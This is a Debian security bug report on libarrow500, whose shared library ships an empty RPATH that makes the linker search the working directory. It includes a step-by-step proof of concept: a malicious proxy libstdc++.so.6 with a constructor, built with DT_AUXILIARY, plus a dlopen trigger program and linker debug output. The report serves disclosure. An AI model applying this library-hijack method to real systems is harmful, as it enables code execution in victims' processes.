<div dir="ltr"><p><span style="font-family:monospace">Package: libarrow500<br>Version: 0~~12.4.1-8+b2<br>Severity: important<br>Tags: security</span></p><p><span style="font-family:monospace"><b><font size="4">Summary:</font></b></span></p><p><span style="font-family:monospace">The libarrow500 Debian package installs the shared library:</span></p><pre><code>/usr/lib/aarch64-linux-gnu/libarrow.so.500<b>
</b></code></pre><p><span style="font-family:monospace">This library contains an RPATH consisting entirely of empty path elements:</span></p><pre><code>RPATH [:::::::]<b>
</b></code></pre><p><span style="font-family:monospace">Empty entries in an ELF RPATH are interpreted by the dynamic linker as the current working directory (CWD). As a result, when libarrow.so.500 resolves its dependencies, the dynamic linker searches the process working directory before falling back to the system library paths.</span></p><p><span style="font-family:monospace">This permits library search path hijacking if an attacker can place a malicious shared library in a directory from which a victim executes software that loads libarrow.so.500.</span></p><p><span style="font-family:monospace"><b><font size="4">Impact:</font></b></span></p><p><span style="font-family:monospace">An attacker can cause execution of attacker-controlled code in the security context of the user running the affected application.</span></p><p><span style="font-family:monospace">Applications that directly or indirectly load libarrow.so.500 may resolve dependencies from the current working directory due to the malformed RPATH. If a victim executes such software from a directory containing attacker-controlled shared libraries, the malicious library may be loaded and executed before the legitimate system library.</span></p><p><span style="font-family:monospace">This is a CWE-426 / CWE-427 class issue (Untrusted Search Path).</span></p><p><span style="font-family:monospace"><b><font size="4">Proof of Concept:</font></b></span></p><p><span style="font-family:monospace"><b>Verify the malformed RPATH:</b></span></p><pre><code>$ readelf -d /usr/lib/aarch64-linux-gnu/libarrow.so.500 | grep RPATH
</code></pre><p><span style="font-family:monospace">Output:</span></p><pre><code>0x000000000000000f (RPATH) Library rpath: [:::::::]
</code></pre><p><span style="font-family:monospace"><b>Create an attacker-controlled replacement library:</b></span></p><pre><code>$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace
$ cat << EOF > poc_arrow.c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
void exploit() {
printf("\n[!!!] ARROW HIJACK SUCCESSFUL [!!!]\n");
exit(0);
}
EOF
</code></pre><p><span style="font-family:monospace"><b>Build a proxy libstdc++.so.6 using DT_AUXILIARY so normal symbol resolution continues to the legitimate system library:</b></span></p><pre><code>$ gcc -shared -fPIC poc_arrow.c \
-o libstdc++.so.6 \
-Wl,-f,/lib/aarch64-linux-gnu/libstdc++.so.6
</code></pre><p><span style="font-family:monospace"><b>Create a program that loads the system Arrow library:</b></span></p><pre><code>$ cat << 'EOF' > trigger.c
#include <stdio.h>
#include <dlfcn.h>
int main() {
void *handle = dlopen(
"/usr/lib/aarch64-linux-gnu/libarrow.so.500",
RTLD_NOW
);
if (!handle)
printf("%s\n", dlerror());
return 0;
}
EOF
$ gcc trigger.c -o trigger</code></pre><p><span style="font-family:monospace"><b>Execute from the attacker-controlled directory:</b></span></p><pre><code>$ ./trigger
</code></pre><p><span style="font-family:monospace"><b>Result:</b></span></p><pre><code>[!!!] ARROW HIJACK SUCCESSFUL [!!!]
</code></pre><p><span style="font-family:monospace"><b>Additional Verification:</b></span></p><p><span style="font-family:monospace">Dynamic linker debugging confirms that dependency resolution is performed through the RPATH embedded in libarrow.so.500 and that the linker first attempts to load a bare filename from the current working directory:</span></p><p><span style="font-family:monospace">$ LD_DEBUG=libs ./trigger<br>...<br></span><code>find library=libstdc++.so.6 [0]; searching</code></p><pre><code> search path= (RPATH from file /usr/lib/aarch64-linux-gnu/libarrow.so.500)
trying file=libstdc++.so.6<br>...
</code></pre><p><span style="font-family:monospace">The malicious libstdc++.so.6 is subsequently loaded and its constructor executes.</span></p><p><span style="font-family:monospace"><b>Expected Fix:</b></span></p><p><span style="font-family:monospace">The package should not ship shared libraries containing empty RPATH elements. The RPATH should be removed entirely or replaced with an explicit, trusted search path.</span></p><span style="font-family:monospace"><br></span></div>